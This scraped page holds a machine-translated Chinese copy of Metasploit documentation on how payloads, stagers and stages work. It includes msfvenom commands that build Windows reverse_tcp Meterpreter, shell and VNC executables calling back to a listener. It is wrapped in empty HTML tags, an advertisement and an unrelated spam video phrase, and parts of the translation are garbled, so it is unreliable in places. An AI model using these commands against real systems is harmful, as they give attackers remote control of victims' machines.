<ruby id="bdb3f"></ruby>

    <p id="bdb3f"><cite id="bdb3f"></cite></p>

      <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
        <p id="bdb3f"><cite id="bdb3f"></cite></p>

          <pre id="bdb3f"></pre>
          <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

          <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
          <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

          <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                <ruby id="bdb3f"></ruby>

                ??碼云GVP開源項目 12k star Uniapp+ElementUI 功能強大 支持多語言、二開方便! 廣告
                # payloads 如何工作 payload模塊是儲存在`modules/payloads/{singles,stages,stagers}/<platform>`.當框架啟動時,stages和stagers結合起來創造一個完整的載荷.您可以在exploit中使用它。然后,handlers與有效載荷配對,以便框架知道如何創建與給定通信機制的會話。 有效載荷被賦予參考名稱,表示所有的部分,如下所示: - Staged payloads: `<platform>/[arch]/<stage>/<stager>` - Single payloads: `<platform>/[arch]/<single>` 這導致像有效載荷像 `windows/x64/meterpreter/reverse_tcp`.打破這一點,平臺是`windows`,架構是`x64`,最后階段我們交付的是`meterpreter`,而實現它的是`reverse_tcp` 請注意,體系結構是可選的,因為在某些情況下,它是不必要的或暗示的。一個例子是`php/meterpreter/reverse_tcp`。Arch不需要PHP有效載荷,因為我們提供的是解釋代碼,而不是本地代碼。 ### singles 單一的有效載荷是難以忘懷的。他們可以與Metasploit建立溝通機制,但他們不需要。一個可能需要的場景的例子是當目標沒有網絡訪問時 - 通過USB密鑰傳遞的文件格式漏洞利用仍然是可能的。 ### stagers 舞臺是一個小存根,旨在創造某種形式的交流,然后將執行轉移到下一個階段。使用stager解決了兩個問題。首先,它允許我們最初使用一個小的有效載荷來加載更多的功能更大的有效載荷。其次,它使通信機制與最后階段分離成為可能,因此一個有效載荷可以與多個傳輸一起使用而不需要復制代碼。 ### stages 由于stagers會照顧到處理任何規模的限制,為我們分配一大塊內存來運行,所以stage可以是任意大的。這樣做的一個優點是能夠用C這樣的高級語言編寫最終階段的有效載荷。 ## 交付階段 您希望有效載荷連接回的IP地址和端口被嵌入到stager中。如上所述,所有分級的有效載荷不過是建立通信并執行下一階段的小存根。當您使用分階段負載創建可執行文件時,您實際上只是創建了暫存器。所以下面的命令會創建功能相同的exe文件: ``` msfvenom -f exe LHOST=192.168.1.1 -p windows/meterpreter/reverse_tcp msfvenom -f exe LHOST=192.168.1.1 -p windows/shell/reverse_tcp msfvenom -f exe LHOST=192.168.1.1 -p windows/vncinject/reverse_tcp ``` (請注意,這些功能是相同的 - 有很多隨機化進入它,所以沒有兩個可執行文件是完全一樣的。) 1.Ruby端作為客戶端,使用由stager(例如:tcp,http,https)設置的任何傳輸機制。 * 在shell階段的情況下,當您與終端進行交互時,Metasploit會將遠程進程的輸入連接到您的終端。 * 在Meterpreter階段的情況下,Metasploit將開始使用Meterpreter協議。
                  <ruby id="bdb3f"></ruby>

                  <p id="bdb3f"><cite id="bdb3f"></cite></p>

                    <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
                      <p id="bdb3f"><cite id="bdb3f"></cite></p>

                        <pre id="bdb3f"></pre>
                        <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

                        <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
                        <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

                        <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                              <ruby id="bdb3f"></ruby>

                              哎呀哎呀视频在线观看